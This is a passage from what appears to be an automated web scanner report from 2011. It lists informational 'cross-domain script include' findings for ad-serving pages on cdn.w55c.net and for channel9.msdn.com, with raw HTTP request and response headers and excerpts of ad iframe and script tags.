<SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N553.158901.DATAXU/B4970757.16;abr=!ie;sz=728x90;pc=[TPAS_ID];ord=NERCNDNGRkEwMDBFMDk4MTBBRTU3NzUwMjNGNDVBMEN8R0Zmd0tBcHhIeHwxMzAzNjU4NDkyOTk5fDF8MEY2WXJBQmRPUHwwUkV5b1BSTVN6fEVYXzEwMjM0NzcyMDZ8NDIwNDQw?">
</SCRIPT>
...[SNIP]...

24.47. http://cdn.w55c.net/i/0RFFcWpaTN_954073853.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0RFFcWpaTN_954073853.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /i/0RFFcWpaTN_954073853.html?rtbhost=rts-rr15.sldc.dataxu.net&btid=NERCNDQwMTEwMDA4MTBBRDBBRTU4MzRDMzhCQTFCRjV8R0Z1djIzNkVXbHwxMzAzNjU4NTE2OTM4fDF8MEZGeVp3NFpBSnwwUkZGY1dwYVROfEVYXzEwMjM0NzcyMDZ8NTAzNjI2&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRAEQAIEK0K5YNMOLob9Z6R4rJH8FZ3KUYu1A&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZGeVp3NFpBSg&ciu=MFJGRmNXcGFUTg&reqid=NERCNDQwMTEwMDA4MTBBRDBBRTU4MzRDMzhCQTFCRjU&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=503&zc=NzUyMDc&v=0&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=90&slotname=9524956792&w=728&lmt=1303676516&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658516518&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303658516523&frm=1&adk=513358139&ga_vid=1030430259.1303658517&ga_sid=1303658517&ga_hid=340899808&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3961147505&fu=4&ifi=1&dtd=8
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 15:29:54 GMT
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Accept-Ranges: bytes
Last-Modified: Tue, 15 Mar 2011 22:27:10 GMT
Date: Sun, 24 Apr 2011 15:22:04 GMT
Server: w55c.net
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.0 cdn.w55c.net (MII JProxy)
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 1172

<IFRAME SRC="http://ad.doubleclick.net/adi/N5315.158901.DATAXU/B5334493.10;sz=728x90;ord=NERCNDQwMTEwMDA4MTBBRDBBRTU4MzRDMzhCQTFCRjV8R0Z1djIzNkVXbHwxMzAzNjU4NTE2OTM4fDF8MEZGeVp3NFpBSnwwUkZGY1dwYVROfEVYXzEwMjM0NzcyMDZ8NTAzNjI2?" WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'>
<SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N5315.158901.DATAXU/B5334493.10;abr=!ie;sz=728x90;ord=NERCNDQwMTEwMDA4MTBBRDBBRTU4MzRDMzhCQTFCRjV8R0Z1djIzNkVXbHwxMzAzNjU4NTE2OTM4fDF8MEZGeVp3NFpBSnwwUkZGY1dwYVROfEVYXzEwMjM0NzcyMDZ8NTAzNjI2?">
</SCRIPT>
...[SNIP]...

24.48. http://cdn.w55c.net/i/0RZieDDeGI_308736425.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0RZieDDeGI_308736425.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /i/0RZieDDeGI_308736425.html?rtbhost=rts-rr14.sldc.dataxu.net&btid=NERCNDUwOEMwMDBENkZGQzBBRUM2NjEzQkFGRjcwRUV8R0ZIMlV3cUxBSnwxMzAzNjYyNzM0OTIyfDF8MEZZWG9GdFhPUXwwUlppZUREZUdJfDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDfDIwNTc3MQ&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRQjAANb_wK7GYTuv9w7qr-ELGqjb86HRtR-A&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZZWG9GdFhPUQ&ciu=MFJaaWVERGVHSQ&reqid=NERCNDUwOEMwMDBENkZGQzBBRUM2NjEzQkFGRjcwRUU&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=205&zc=NzUyMDc&v=2&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303680735&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303662735800&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303662735812&frm=1&adk=2614322350&ga_vid=273036336.1303662736&ga_sid=1303662736&ga_hid=1991820173&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=14
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 16:32:14 GMT
Cache-Control: no-cache, no-store
Pragma: no-cache
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Date: Sun, 24 Apr 2011 16:30:15 GMT
Accept-Ranges: bytes
Last-Modified: Tue, 29 Mar 2011 15:51:31 GMT
Server: w55c.net
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.0 cdn.w55c.net (MII JProxy)
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 3553

<IFRAME SRC="http://ad.doubleclick.net/adi/N5762.158901.DATAXU/B4799014.12;sz=160x600;ord=NERCNDUwOEMwMDBENkZGQzBBRUM2NjEzQkFGRjcwRUV8R0ZIMlV3cUxBSnwxMzAzNjYyNzM0OTIyfDF8MEZZWG9GdFhPUXwwUlppZUREZUdJfDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDfDIwNTc3MQ?" WIDTH=160 HEIGHT=600 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'>
<SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N5762.158901.DATAXU/B4799014.12;abr=!ie;sz=160x600;ord=NERCNDUwOEMwMDBENkZGQzBBRUM2NjEzQkFGRjcwRUV8R0ZIMlV3cUxBSnwxMzAzNjYyNzM0OTIyfDF8MEZZWG9GdFhPUXwwUlppZUREZUdJfDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDfDIwNTc3MQ?">
</SCRIPT>
...[SNIP]...

24.49. http://cdn.w55c.net/i/0RaZHwYk2m_562981296.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0RaZHwYk2m_562981296.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /i/0RaZHwYk2m_562981296.html?rtbhost=rts-rr15.sldc.dataxu.net&btid=NERCNDQwOTEwMDBERUFGNjBBRTU3RkNEMzhCNTMzNzJ8R0ZHWXhySXJOM3wxMzAzNjU4NjQ1MjkyfDF8MEZKak0yUU5jS3wwUmFaSHdZazJtfEVYXzEwMjM0NzcyMDZ8NDY3MTU4&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRAkQAN6vYK5X_NOLUzcqM_ssWL-1bQiOIurQ&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZKak0yUU5jSw&ciu=MFJhWkh3WWsybQ&reqid=NERCNDQwOTEwMDBERUFGNjBBRTU3RkNEMzhCNTMzNzI&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=467&zc=NzUyMDc&v=0&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=90&slotname=9524956792&w=728&lmt=1303676644&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658644881&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303658644887&frm=1&adk=513358139&ga_vid=1984226007.1303658645&ga_sid=1303658645&ga_hid=40124116&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3961147505&fu=4&ifi=1&dtd=9
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 15:30:18 GMT
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Accept-Ranges: bytes
Last-Modified: Thu, 21 Apr 2011 23:51:09 GMT
Date: Sun, 24 Apr 2011 15:24:15 GMT
Server: w55c.net
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.0 cdn.w55c.net (MII JProxy)
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 1246

<IFRAME SRC="http://ad.doubleclick.net/adi/N3016.158901.DATAXU/B5398270.22;sz=728x90;pc=[TPAS_ID];ord=NERCNDQwOTEwMDBERUFGNjBBRTU3RkNEMzhCNTMzNzJ8R0ZHWXhySXJOM3wxMzAzNjU4NjQ1MjkyfDF8MEZKak0yUU5jS3wwUmFaSHdZazJtfEVYXzEwMjM0NzcyMDZ8NDY3MTU4?" WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'>
<SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N3016.158901.DATAXU/B5398270.22;abr=!ie;sz=728x90;pc=[TPAS_ID];ord=NERCNDQwOTEwMDBERUFGNjBBRTU3RkNEMzhCNTMzNzJ8R0ZHWXhySXJOM3wxMzAzNjU4NjQ1MjkyfDF8MEZKak0yUU5jS3wwUmFaSHdZazJtfEVYXzEwMjM0NzcyMDZ8NDY3MTU4?">
</SCRIPT>
...[SNIP]...

24.50. http://cdn.w55c.net/i/0RilLTaqf1_958911823.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0RilLTaqf1_958911823.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /i/0RilLTaqf1_958911823.html?rtbhost=rts-rr13.sldc.dataxu.net&btid=NERCNDU0RjYwMDBBNzE5NzBBRUM2NThCQ0E4MTRBNUF8R0ZVeWQxclZsYXwxMzAzNjYzODY0NzY1fDF8MEZTb3MxV1lvZXwwUmlsTFRhcWYxfDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDfDYxMTg4MQ&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRU9gAKcZcK7GWLyoFKWsZOaIGHRR4fdymMmw&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZTb3MxV1lvZQ&ciu=MFJpbExUYXFmMQ&reqid=NERCNDU0RjYwMDBBNzE5NzBBRUM2NThCQ0E4MTRBNUE&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=611&zc=NzUyMDc&v=2&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303681865&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303663865478&bpp=16&shv=r20110420&jsv=r20110415&correlator=1303663865496&frm=1&adk=2614322350&ga_vid=1538346491.1303663866&ga_sid=1303663866&ga_hid=2007194349&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&eid=33895132&fu=4&ifi=1&dtd=121
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 16:56:20 GMT
Cache-Control: no-cache, no-store
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Date: Sun, 24 Apr 2011 16:50:11 GMT
Accept-Ranges: bytes
Last-Modified: Wed, 06 Apr 2011 17:50:22 GMT
Server: w55c.net
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.0 cdn.w55c.net (MII JProxy)
Pragma: no-cache
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 1380

<IFRAME SRC="http://ad.doubleclick.net/adi/N4637.158901.6939390485621/B5385253.8;sz=160x600;pc=[TPAS_ID];ord=NERCNDU0RjYwMDBBNzE5NzBBRUM2NThCQ0E4MTRBNUF8R0ZVeWQxclZsYXwxMzAzNjYzODY0NzY1fDF8MEZTb3MxV1lvZXwwUmlsTFRhcWYxfDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDfDYxMTg4MQ?" WIDTH=160 HEIGHT=600 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'>
<SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N4637.158901.6939390485621/B5385253.8;abr=!ie;sz=160x600;pc=[TPAS_ID];ord=NERCNDU0RjYwMDBBNzE5NzBBRUM2NThCQ0E4MTRBNUF8R0ZVeWQxclZsYXwxMzAzNjYzODY0NzY1fDF8MEZTb3MxV1lvZXwwUmlsTFRhcWYxfDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDfDYxMTg4MQ?">
</SCRIPT>
...[SNIP]...

24.51. http://cdn.w55c.net/i/0RkPQrQRFy_1341446950.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0RkPQrQRFy_1341446950.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /i/0RkPQrQRFy_1341446950.html?rtbhost=rts-rr11.sldc.dataxu.net&btid=NERCNDNGQTAwMDA4NzgwQjBBRTU3RTg4MzBCMTREOEJ8R0Z4SVo3ZkJBZHwxMzAzNjU4NDAyNTg0fDF8MEYzTllTc2l3d3wwUmtQUXJRUkZ5fEVYXzEwMjM0NzcyMDZ8MTM4OTYy&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbQ_oAAIeAsK5X6IMLFNiw5YQb_V37aYux-2HA&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEYzTllTc2l3dw&ciu=MFJrUFFyUVJGeQ&reqid=NERCNDNGQTAwMDA4NzgwQjBBRTU3RTg4MzBCMTREOEI&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=138&zc=NzUyMDc&v=0&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=90&slotname=9524956792&w=728&lmt=1303676403&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658403541&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303658403548&frm=1&adk=513358139&ga_vid=764788207.1303658404&ga_sid=1303658404&ga_hid=1212953574&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3961147505&fu=4&ifi=1&dtd=10
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 15:20:14 GMT
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Accept-Ranges: bytes
Last-Modified: Fri, 01 Apr 2011 14:32:11 GMT
Date: Sun, 24 Apr 2011 15:19:34 GMT
Server: w55c.net
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.0 cdn.w55c.net (MII JProxy)
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 1238

<IFRAME SRC="http://ad.doubleclick.net/adi/N553.158901.DATAXU/B5114832.6;sz=728x90;pc=[TPAS_ID];ord=NERCNDNGQTAwMDA4NzgwQjBBRTU3RTg4MzBCMTREOEJ8R0Z4SVo3ZkJBZHwxMzAzNjU4NDAyNTg0fDF8MEYzTllTc2l3d3wwUmtQUXJRUkZ5fEVYXzEwMjM0NzcyMDZ8MTM4OTYy?" WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'>
<SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N553.158901.DATAXU/B5114832.6;abr=!ie;sz=728x90;pc=[TPAS_ID];ord=NERCNDNGQTAwMDA4NzgwQjBBRTU3RTg4MzBCMTREOEJ8R0Z4SVo3ZkJBZHwxMzAzNjU4NDAyNTg0fDF8MEYzTllTc2l3d3wwUmtQUXJRUkZ5fEVYXzEwMjM0NzcyMDZ8MTM4OTYy?">
</SCRIPT>
...[SNIP]...

24.52. http://cdn.w55c.net/i/0Rl7Vm3VTU_682412618.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0Rl7Vm3VTU_682412618.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /i/0Rl7Vm3VTU_682412618.html?rtbhost=rts-rr18.sldc.dataxu.net&btid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjZ8R0ZQOWdsRlJLUnwxMzAzNjYxOTk0MTYzfDF8MEZXTmpRSzNBVHwwUmw3Vm0zVlRVfDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDfDc1MzM3Nw&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRNqAABcpYK5X5iGNAFJh24yaOdrpmneXfYCA&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZXTmpRSzNBVA&ciu=MFJsN1ZtM1ZUVQ&reqid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjY&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=753&zc=NzUyMDc&v=2&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303679995&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303661995029&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303661995034&frm=1&adk=2614322350&ga_vid=1092593501.1303661995&ga_sid=1303661995&ga_hid=294155726&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=7
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:13:06 GMT
Server: w55c.net
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 16:19:53 GMT
Cache-Control: no-cache, no-store
content-type: text/html
P3P: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Accept-Ranges: bytes
Last-Modified: Tue, 19 Apr 2011 21:53:32 GMT
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.1 cdn.w55c.net (MII JProxy)
Age: 409
pragma: no-cache
Via: 1.1 mdw061001 (MII-APC/1.6)
Content-Length: 2174

<IFRAME SRC="http://ad.doubleclick.net/adi/N4860.158901.DATAXU/B5300325.14;sz=160x600;click=http://i.w55c.net/cl?&t=1&ei=GOOGLE_CONTENTNETWORK&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&ccw=SUFCMSMwLjB
...[SNIP]...
ZXTmpRSzNBVHwwUmw3Vm0zVlRVfDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDfDc1MzM3Nw?" WIDTH=160 HEIGHT=600 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'>
<SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N4860.158901.DATAXU/B5300325.14;abr=!ie;sz=160x600;click=http://i.w55c.net/cl?&t=1&ei=GOOGLE_CONTENTNETWORK&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&reqid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjY&slotid=MQ&fiu=MEZXTmpRSzNBVA&ciu=MFJsN1ZtM1ZUVQ&epid=&refurl=&s=http://pub.retailer-amazon.net/banner_120_600_b.php&wp_exchange=TbRNqAABcpYK5X5iGNAFJh24yaOdrpmneXfYCA&dv=&dm=&os=&scres=&gen=&age=&zc=NzUyMDc&rurl=;ord=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjZ8R0ZQOWdsRlJLUnwxMzAzNjYxOTk0MTYzfDF8MEZXTmpRSzNBVHwwUmw3Vm0zVlRVfDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDfDc1MzM3Nw?">
</SCRIPT>
...[SNIP]...

24.53. http://channel9.msdn.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://channel9.msdn.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: channel9.msdn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNetMvc-Version: 2.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 15:59:53 GMT
Content-Length: 84292

<!doctype html>
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
